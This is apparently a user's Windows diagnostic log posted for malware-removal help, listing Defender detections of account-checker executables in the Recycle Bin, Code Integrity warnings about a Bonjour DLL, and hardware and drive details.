Path: file:_C:\$Recycle.Bin\S-1-5-21-230749707-3925018352-439227168-1001\$RMB6J1E\Checkers\000webhost.com Accounts Checker By X-SLAYER.exe; file:_C:\$Recycle.Bin\S-1-5-21-230749707-3925018352-439227168-1001\$RMB6J1E\Checkers\Adfoc.us Checker By X-SLAYER.exe; file:_C:\$Recycle.Bin\S-1-5-21-230749707-3925018352-439227168-1001\$RMB6J1E\Checkers\Alexa Accounts Checker By X-SLAYER.exe; file:_C:\$Recycle.Bin\S-1-5-21-230749707-3925018352-439227168-1001\$RMB6J1E\Checkers\Amazon Valid Email Checker By X-SLAYER.exe; file:_C:\$Recycle.Bin\S-1-5-21-230749707-3925018352-439227168-1001\$RMB6J1E\Checkers\Bet365 Accounts Checker By X-SLAYER.exe; file:_C:\$Recycle.Bin\S-1-5-21-230749707-3925018352-439227168-1001\$RMB6J1E\Checkers\Betfair Accounts Checker By X-SLAYER.exe; file:_C:\$Recycle.Bin\S-1-5-21-230749707-3925018352-439227168-1001\$RMB6J1E\Checkers\Bohoo Accounts Checker By X-SLAYER.exe; file:_C:\$Recycle.Bin\S-1-5-21-230749707-3925018352-439227168-1001\$RMB6J1E\Checkers\Bonusbitcoin Accounts Checker By X-SLAYER.exe; file:_
Detection Origin: Local machine
Detection Type: Concrete
Detection Source: Real-Time Protection
Process Name: C:\Windows\svchost.com
Security intelligence Version: AV: 1.313.2035.0, AS: 1.313.2035.0, NIS: 1.313.2035.0
Engine Version: AM: 1.1.16900.4, NIS: 1.1.16900.4
CodeIntegrity:
===================================
Date: 2020-04-23 10:08:52.002
Description: 
Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Microsoft signing level requirements.
Date: 2020-04-23 10:08:52.001
Description: 
Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Microsoft signing level requirements.
Date: 2020-04-23 10:08:51.687
Description: 
Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Microsoft signing level requirements.
Date: 2020-04-23 10:08:51.686
Description: 
Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Microsoft signing level requirements.
Date: 2020-04-23 10:07:27.749
Description: 
Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Custom 3 / Antimalware signing level requirements.
Date: 2020-04-23 10:07:27.749
Description: 
Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Custom 3 / Antimalware signing level requirements.
Date: 2020-04-23 10:07:27.627
Description: 
Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Custom 3 / Antimalware signing level requirements.
Date: 2020-04-23 10:07:27.626
Description: 
Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Custom 3 / Antimalware signing level requirements.
==================== Memory info =========================== 
BIOS: American Megatrends Inc. A.A0 06/18/2019
Motherboard: Micro-Star International Co., Ltd. X470 GAMING PLUS (MS-7B79)
Processor: AMD Ryzen 5 2600 Six-Core Processor 
Percentage of memory in use: 49%
Total physical RAM: 16332.53 MB
Available physical RAM: 8251.76 MB
Total Virtual: 28620.53 MB
Available Virtual: 16095.94 MB
==================== Drives ================================
Drive c: () (Fixed) (Total:446.5 GB) (Free:213.04 GB) NTFS
\\?\Volume{f1e9235f-570a-4ef7-bacb-83127ccb793d}\ (Recovery) (Fixed) (Total:0.52 GB) (Free:0.11 GB) NTFS
\\?\Volume{6e5438c6-b60e-4753-9678-dd64bf0a9dad}\ () (Fixed) (Total:0.09 GB) (Free:0.07 GB) FAT32
==================== MBR & Partition Table ====================
==================== End of Addition.txt =======================
Thank you so much for your help and hope to hear from you soon.

Comments

Popular Posts

System detected an overrun of a stack-based buffer in this application [FIX] - Windows Report

Valorant anti-cheat lead answers many questions on Reddit - Millenium US